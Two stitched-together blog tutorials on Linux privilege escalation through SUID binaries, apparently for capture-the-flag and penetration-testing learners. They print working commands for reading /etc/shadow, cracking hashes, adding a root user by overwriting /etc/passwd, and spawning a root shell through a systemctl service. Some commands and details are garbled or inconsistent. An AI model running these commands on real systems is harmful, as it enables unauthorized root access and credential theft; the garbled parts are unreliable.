Linux privilege escalation suid

Linux Privilege Escalation: SUID

What is privilege escalation? Read how to escalate using SUID permission files.

Ben Spring

Set owner User ID up on execution

This blog post will explain what privilege escalation is and how we can escalate our privileges using SUID permission files. Use these to solve the challenge 8 of the Christmas Advent of Cyber!

What is Privilege Escalation?

Computer systems are designed to be used by multiple users, and privileges mean what a user is permitted to do. Common privileges include viewing and editing files, or modifying system files.

Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.

What is SUID?

Set owner UserID up on execution is a special type of file permission given to a file. When a user runs a program, given they have the correct reading/executing rights, it will run using their account privileges. SUID allows a user to run a program using another users privileges. To further understand file privileges, complete challenge 4 in the Christmas room or read the supporting material here.

In some cases, we can take advantage of having a file run as another user, to execute commands as them. You might be thinking, why allow anyone to run a file as another user in the first place? However, we need to have certain binaries run as root by a non-privileged user.

For example, if we change our password on Linux, the program that does this needs the permissions to right to the file system. You might not have permissions to write to the /etc/ directory, but root does. This is why the passwd binary has the SUID bit set.

If a binary has the SUID bit set, it will have an s appear. If we check the file permissions of the passwd binary, we can see the permissions are —rwsr-xr-x.

The SUID bit is set on the execute permission, meaning when a user runs this, it will run as the file owner (which is root).

In essence, SUID files execute with the permission of the file owner.

Taking advantage of SUID files

Some administrators will set the SUID bit manually to allow certain programs to be run as them. Lets say you’re a system administrator and a non-privileged user wants to program that requires it to be run with higher privileges. They can set the SUID bit, then the non-privileged user can execute the program without having any extra account permissions set.

We can scan the whole file system to find all files with the SUID bit set, with the following code:

find / -user root -perm -4000 -exec ls -ldb <> \;

The find command has a parameter where it can execute commands. So when it finds a file, it will list its permissions. The output will reveal something similar to this:

We can see a few binaries that run as the root user, which are legitimate programs that have the right permissions set to properly perform a task.

If a sysadmin has manually set an SUID bit on a binary, the code above will find it. Perhaps there is a custom file that has been created by another user that runs as root? You might be able to leverage this program to escalate your privileges or run commands you’d not normally be able to.

Tip for SUID Challenge, Question 1

A normal standard Linux binary (such as the find command), can have its file owner changed and have an SUID bit set.

For example, if we wanted to see what user is the find command running as, we could do:

touch foo find foo -exec whoami \; 

This will find the file foo (which we’ve just created), then run the execute the code you have stated in -exec parameter.

Tip for SUID Challenge, Question 2

Found a file that looks suspicious? Try running it and seeing what you can do with it? Run whoami to see if the file actually runs as the file owner.

If you’re given an option to run a command as another user. Why not run /bin/bash to run bash (to get a shell) as another user..

Sign up for more like this.

The World’s Cyber Security Powerhouses — Who’s Leading, Who’s Lagging?

Dive into our first ever eBook, exploring the security posture around the globe and analysing who is leading and lagging in the global race.

HiroNewf’s Red Team Capstone Write-Up Submission

Congratulations, HiroNewf! Take a look at the attack paths HiroNewf took and read her write-up submission from our Red Team Capstone Challenge Network.

Four Careers in Ethical Hacking

Explore four of the most in-demand ethical hacking careers, and find out how our learning paths can prepare you and help you achieve a career in ethical hacking.

Источник

Linux Privilege Escalation – SUID Binaries

Linux has several access attributes that can allow users or groups to perform certain actions against files, such as execute, modify or view files.

SUID (Set User Identification) and GUID (Set Group Identification) are permissions that allow users to execute a binary or script with the permissions of its owner (SUID) or of its group (GUID).

Some binaries have this permission by default as they require to perform certain actions with elevated privileges, for example the passwd binary needs to run as root in order to change a user’s password, although certain binaries can be exploited to escalate privileges if they have the SUID bit set.

Finding Existing SUID Binaries

The following command can be used to identify any existing binaries that has the SUID or GUID permissions assigned to them:

find / -perm -u=s -type f 2>/dev/null; find / -perm -4000 -o- -perm -2000 -o- -perm -6000

The above uses the Linux find command, which is used to find files and directories, with the following flags:

• / to specify to start searching from the root directory
• -perm to find files that contains certain permissions, with -u=s for files owned by the root user and -4000/-2000/-6000 for files
• -type to specify the type of search (files, folders etc)
• 2>/dev/null to redirect errors to the black hole

Automated enumeration tools such as LinPEAS can also find SUID binaries:

The following command can be used to find if an individual binary has the SUID permission set:

Identifying Vulnerable SUID Binaries

To identify if any of these can be exploited, GTFOBins can come in handy.

GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. It allows to search for binaries or commands to check whether SUID permisions could allow to escalate privilege.

The search bar can be used to find the command and this will show ways to exploit such command. The “SUID” section is what this attack requires.

Automated enumeration tools such as LinPEAS can also flag vulnerable binaries:

Exploitation

Vulnerable SUID binaries can potentially be used to read or write to restricted files, upload/download files, execute commands as root or obtain a shell with elevated privileges.

Certain builtin Linux binaries can be easily exploited to gain a root shell:

SUID privileges on one of the above binaries almost always results in a full system compromise. This really exhaustive article explains in great detail how these can be exploited. A few more examples can be found below:

Example #1 – Grep (File Read)

Grep, a Linux command-line utility that uses regular expression to search in plain-text files, can be exploited to read restricted files:

The example below demonstrates how the /etc/shadow file, which contains user hashes, can be viewed as a normal user:

Once extracted, the hashes could then be cracked using tools such as Hydra or John the Ripper:

john --wordlist=wordlist_file hashes_file

Example #2 – MV (File Write)

MV, a Linux command-line utility used to move files or directories, can be used to move files on top of existing ones, effectively overriding them.

This could be exploited by adding a new line to the /etc/passwd file, effectively adding a new user to the system.

Generating a new user hash with the following command:

openssl passwd -1 -salt salt password

Copying the /etc/passwd file to /tmp and adding a new line for a new “stefhacked” user using the generated hash, encoding dollar signs:

cd /tmp cp /etc/passwd /tmp/passwd echo "user:hash:0:0:Ubuntu. /home/stef:/bin/bash" >> passwd

Replacing the /etc/passwd file with the new /tmp/passwd file and changing user to the newly created “stefhacked” user:

mv passwd /etc/passwd su newuser

Example #3 – SystemCTL (Root Shell)

SystemCTL, a Linux software suite used to manage services, can be exploited by creating a service that, when started, will execute an arbitrary command as root. In the example below it will create a SUID copy of the /bin/bash binary, therefore allowing an attacker to execute bash as root:

TF=$(mktemp).service echo '[Service] Type=oneshot ExecStart=/bin/sh -c "cp /bin/bash /tmp/stef && chmod +s /tmp/stef" [Install] WantedBy=multi-user.target' > $TF systemctl link $TF systemctl enable --now $TF /tmp/stef -p

Conclusion

Although SUID is necessary in Linux system to perform daily operations and is often useful for system administrators in order to allow regular users to execute certain binaries or commands, it can pose a huge security risk.

The SUID permission should not be applied to any binaries that have the ability to execute code or commands, read/write to files or create services.

Источник